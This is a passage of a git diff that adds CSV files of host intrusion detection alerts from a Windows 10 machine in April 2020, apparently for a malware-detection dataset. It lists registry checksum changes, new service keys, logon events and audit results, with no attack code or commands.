was added. +" +"Apr 4, 2020 @ 16:18:13.837",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:13.852",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:39.809",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:39.839",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29f1e\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 16:18:39.856",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29f1e' was added. 
+" +"Apr 4, 2020 @ 16:18:47.150",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:47.166",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:49.024",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:49.041",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:49.603",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:49.619",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:19:06.358",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:19:06.390",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:19:07.291",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:19:07.307",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:19:17.307",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:19:17.323",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_29f1e' was added. 
+" +"Apr 4, 2020 @ 16:20:28.980",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'", +"Apr 4, 2020 @ 16:20:33.683",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)", +"Apr 4, 2020 @ 16:12:01.754",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:12:31.145",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:13:33.449",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:14:08.927",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:14:27.686",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:16:28.546",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 4, 2020 @ 16:16:29.194",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:16:30.447",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:16:30.490",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:16:37.784",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:16:38.210",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 16:16:38.428",3,"The database engine attached a database", +"Apr 4, 2020 @ 16:16:38.976",3,"The Windows Search Service started", +"Apr 4, 2020 @ 16:16:45.210",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:16:45.229",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:16:45.258",3,"Windows User Logoff", +"Apr 4, 2020 @ 16:16:45.281",3,"Windows User Logoff", +"Apr 4, 2020 @ 16:16:48.601",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:17:12.945",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:17:58.852",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:18:29.248",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:18:58.791",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:20:33.714",3,"Service startup type was changed", 
diff --git a/data/MW_14_HIDS_2.csv b/data/MW_14_HIDS_2.csv
new file mode 100644
index 0000000..0728296
--- /dev/null
+++ b/data/MW_14_HIDS_2.csv
@@ -0,0 +1,1393 @@
+timestamp,"rule.level","rule.description","full_log","data.win.system.message"
+"Apr 24, 2020 @ 13:13:36.184",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: 'cf3754ae4c53bb01ca8f4706679eb2c1'
+New md5sum is : '185d612f78fce1526ce008c1931abcc6'
+Old sha1sum was: 'e6b6ed8af81664d49dc704d5d1fe570c44b0494f'
+New sha1sum is : '7a7004354744dcd7886dc8307a1634cc3a0e059c'
+",
+"Apr 24, 2020 @ 13:13:36.169",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '6484aaf5ea7798f1bf32f0804fa1d0bb'
+New md5sum is : '100ead94668944d84b2a1144423fcb73'
+Old sha1sum was: 'fc8cbbf8be08cb003f070ba6949ee1944ad70d2d'
+New sha1sum is : '455e697a971d8f61c574214108cb1d5263461398'
+",
+"Apr 24, 2020 @ 13:13:34.825",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows' checksum changed.
+Old md5sum was: '49574a9da5b73510ecb8125c7786d037'
+New md5sum is : '4d6e359f48b4d661879fa30d266022bd'
+Old sha1sum was: 'fc3c9a4be6b806a974693af1dc528845db7631da'
+New sha1sum is : '36dbf8e97699b0ca2ccc6e1503bfdfbfc3494986'
+",
+"Apr 24, 2020 @ 13:13:32.732",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_69cbe' was added.
+",
+"Apr 24, 2020 @ 13:13:32.716",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_69cbe\Security' was added.
+",
+"Apr 24, 2020 @ 13:13:25.685",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed.
+Old md5sum was: 'f3f5f5fdd6f39cf62e69610c4b6eeae1' +New md5sum is : '29f6279048392e596b289f171bfe2117' +Old sha1sum was: '260824863a974bdbdbfd3edb7f0e7b125a50d50d' +New sha1sum is : 'fb61655b893457d5b89950bcb8e574fb0c2b2ee0' +", +"Apr 24, 2020 @ 13:13:25.670",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '1ae2be33276cc123ae315374ecb4bbdb' +New md5sum is : '6802c32dd7e97c204d9b4a5103edb8fd' +Old sha1sum was: '70a0b632322092d49ef0d93a8084c6c74562b3dd' +New sha1sum is : 'a3026a7f639946e032b0592d9980b64bf802ba17' +", +"Apr 24, 2020 @ 13:13:25.013",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'ee77ddbee1ed560d6b349650e8349414' +New md5sum is : '711af8bef5843e2b181a65e02f7ec4e7' +Old sha1sum was: '6c5f559746b6a7a4faf287183a528aa3790a9772' +New sha1sum is : '38360c17547cafecdf62b6be07a2e1aff8bca9dd' +", +"Apr 24, 2020 @ 13:13:21.170",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:21.153",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:13:19.997",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:19.981",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:13:17.342",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. 
+Old md5sum was: '5b5e36f557a71edd65caa6a11cda9191' +New md5sum is : 'a5e73c9f12ca5ca1a2e91341b6d7e1e1' +Old sha1sum was: '0763b6960462085ba4b95f8dd74de49818cad40f' +New sha1sum is : 'ddad54675629131da3047b42c43628bd747e5262' +", +"Apr 24, 2020 @ 13:13:13.496",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: 'b7992042185fc6ec85e366e31893c993' +New md5sum is : '106c676c812191a74d1c845f04603231' +Old sha1sum was: '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +New sha1sum is : '935b4cfc84744b913c948f1140563c880fa44307' +", +"Apr 24, 2020 @ 13:13:11.341",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: 'dc9f9e3fba782230828c1350ebdd6327' +New md5sum is : 'abe41aab895e504aa874d1b2b8792e94' +Old sha1sum was: 'df82c4e7b328c25ab2a829fbb36079904d347a00' +New sha1sum is : '9daf66238ba18f6f989346a0d4ba77fa2e949329' +", +"Apr 24, 2020 @ 13:13:11.325",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0447d0d52ee5a830c05fbee07043f258' +New md5sum is : 'b53bf2f3f61682c350be645945192116' +Old sha1sum was: 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +New sha1sum is : 'b5f04a7f7762c384b95b4d56b16e28e5cc863241' +", +"Apr 24, 2020 @ 13:13:07.545",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:10:04Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:13:06.669",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. 
+Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : 'f7e3ede101883838642b014adb830ba3' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '77ead1a75e96863caf4602afa49e9fabf7cf3623' +", +"Apr 24, 2020 @ 13:13:04.575",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:04.559",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:13:04.079",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:04.068",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:13:02.373",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:02.356",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:54.982",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:54.951",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_69cbe\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 13:12:54.936",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:50.935",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. 
+Old md5sum was: 'b85132a0856accdaadf483c328604620' +New md5sum is : 'a635cc7d63339ac3075b507a97dc0727' +Old sha1sum was: '80153a47c9a0dbd7178a3eb90d1718ccd39c8805' +New sha1sum is : '2ab013a07ae2703176febea130ae9ddc53ac1615' +", +"Apr 24, 2020 @ 13:12:45.389",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: 'ae9643074ec7a4ef81bb63a482e527c9' +New md5sum is : '1c6e2319780c0264f929f3c3433add82' +Old sha1sum was: 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +New sha1sum is : 'f924403989ef2de336c156640b73fb0db5024306' +", +"Apr 24, 2020 @ 13:12:39.514",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. 
The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:12:36.107",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '82b30eaa417a603e1be4cf6a8e7d1780' +New md5sum is : '6073decf84a173eeedd11a3559b16ec1' +Old sha1sum was: '06cff1d46c183923be141be79d7942caf890168a' +New sha1sum is : 'f18af090c617e4708f33242930b7538c92479f32' +", +"Apr 24, 2020 @ 13:12:29.889",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '0f373677e8420ba91bd16d2b118fd873' +New md5sum is : 'cce358497fdfdde2833a161f70210463' +Old sha1sum was: '7cfdcf480a3cb8adf138d3f5deabf3f648b63dee' +New sha1sum is : 'd63f655305d47c49eeeee9df2ad94c7fd2ec28a2' +", +"Apr 24, 2020 @ 13:12:28.523",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_69cbe' was added. 
+", +"Apr 24, 2020 @ 13:12:28.500",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:28.421",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:28.399",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:28.120",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:28.098",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:27.498",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:27.480",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:27.322",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:27.305",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:25.953",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:25.935",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_69cbe\Security' was added. 
+", +"Apr 24, 2020 @ 13:12:25.781",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:25.764",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:25.693",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:25.675",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:23.967",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. 
The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:12:23.310",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:23.297",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 13:12:23.275",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 13:12:23.250",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 13:12:23.232",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 13:12:23.215",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\TriggerInfo\0' was added. 
+", +"Apr 24, 2020 @ 13:12:23.211",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:22.107",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:22.092",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:21.841",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '423bc04012208584e3146b2b1e60cd7b' +New md5sum is : '9f95a12e467bbf352a90602d9f025d5d' +Old sha1sum was: 'b945526a2a2ba5f02dc034646d066b528e36b1ee' +New sha1sum is : 'c5c884aae620a6430070a4a03dc8d115ad37148f' +", +"Apr 24, 2020 @ 13:12:21.824",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '0605cdb24f1ff5338bc41392ba73d94f' +New md5sum is : 'a73a335588651cfda297cd10b7ebe55e' +Old sha1sum was: 'f486515c8d4c93497c80cacf50cdf5c398a099e9' +New sha1sum is : '36e61788f9f92ff546c43f33c5b94f4b7e4609ce' +", +"Apr 24, 2020 @ 13:12:21.795",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'f8747906b6607d91d1b84f1d1bcb8184' +New md5sum is : 'f90b0689dbdea07bf5bf46f391e73bca' +Old sha1sum was: 'f7fe1c2866d11ad676d8ebbefa88c1039f2a0af9' +New sha1sum is : '718d3adbe4f76654fbcafae76e4dc88b8a9b8325' +", +"Apr 24, 2020 @ 13:12:19.419",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_69cbe' was added. 
+", +"Apr 24, 2020 @ 13:12:19.403",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:18.733",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'bec7923af911bc42900a4d74cc4d4af4' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : '5456e9d4456d03fb3f15c7ac02d91333683f3043' +", +"Apr 24, 2020 @ 13:11:44.873",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:10:42Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:11:44.232",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'bec7923af911bc42900a4d74cc4d4af4' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : '5456e9d4456d03fb3f15c7ac02d91333683f3043' +", +"Apr 24, 2020 @ 13:11:20.703",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:11:17.159",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 13:11:15.560",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Security\SAM' checksum changed. +Old md5sum was: '85a6f1b1286ecf20e01235e2d33ec25a' +New md5sum is : 'bbf5b60c1ec7b2d74e5edac3eade9c29' +Old sha1sum was: 'dc139d9e9ad39ee0dadd9b4f52db078581cfb394' +New sha1sum is : 'c51cca6db4d9b2f22e973c9b365f3237afa78444' +", +"Apr 24, 2020 @ 13:11:11.252",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 13:11:08.773",3,"The database engine attached a database",,"""SearchIndexer (4700,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). 
